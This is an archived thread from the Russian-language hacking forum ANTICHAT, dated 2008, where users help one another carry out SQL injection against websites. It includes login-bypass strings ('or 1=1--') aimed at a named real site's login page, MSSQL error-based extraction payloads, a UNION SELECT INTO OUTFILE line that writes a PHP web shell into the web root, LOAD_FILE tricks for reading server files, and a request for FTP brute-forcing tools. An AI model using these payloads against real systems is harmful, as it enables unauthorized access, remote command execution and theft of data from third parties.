ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.12.2008, 02:49
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Если инъекция в пост запросе, ты плюсы ставишь? На сколько я заметил, там плюc канает за плюс и тд  то есть:
1' or 1=(select user)+char(0x7e) выдаст : 'dbo~'
На недельке как налажу регексы планирую выложить свой софт для mssql инъекций.
Последний раз редактировалось SHS; 05.12.2008 в 02:52..
|
|
|
05.12.2008, 12:00
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp
|
|
|
|
05.12.2008, 12:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Ershik
Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp
ник') or 1=1--(пробел)
|
|
|
|
05.12.2008, 12:27
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
может не в тему чуток..но всё таки..чем напарсить линки для брута фтп?
да и Брутусае2 залейте...а то удалил его..
|
|
|
|
05.12.2008, 15:58
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(
|
|
|
|
05.12.2008, 16:07
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Сообщение от geforse
Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(
union select 1,<? system($_GET[cmd]); ?>,3 from users into outfile '/www/site/temp/shell.php'/*
p.s: https://forum.antichat.ru/showthread.php?t=34338
|
|
|
|
05.12.2008, 16:13
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Login: ' or 1=(@@version)--
Pwd: qwerty
exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', '' or 1=(@@version)--', 'qwery'
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'or'.
Вот часть запроса выудил. Как можно сформировать запрос чтоб получить результат?
|
|
|
|
05.12.2008, 22:32
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
SHS попробуй войти вод админом )
exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', 'admin or 1=1--', 'pass'
|
|
|
|
05.12.2008, 23:38
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 8
Провел на форуме:
41669
Репутация:
1
|
|
столкнулся с проблемой, делаю union select into outfile '1.txt' оно его сохраняет в папку var/db/mysql/ но это на уровень выше чем то где находится сам сайт, короче вот так http://aaa.ru/1.txt на него не зайдеш он где то ближе лежит, вопрос как узнать где лежит сайт? там можно без полного пути, начиная с var/
Последний раз редактировалось InvisibleSM; 05.12.2008 в 23:41..
|
|
|
|
06.12.2008, 00:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
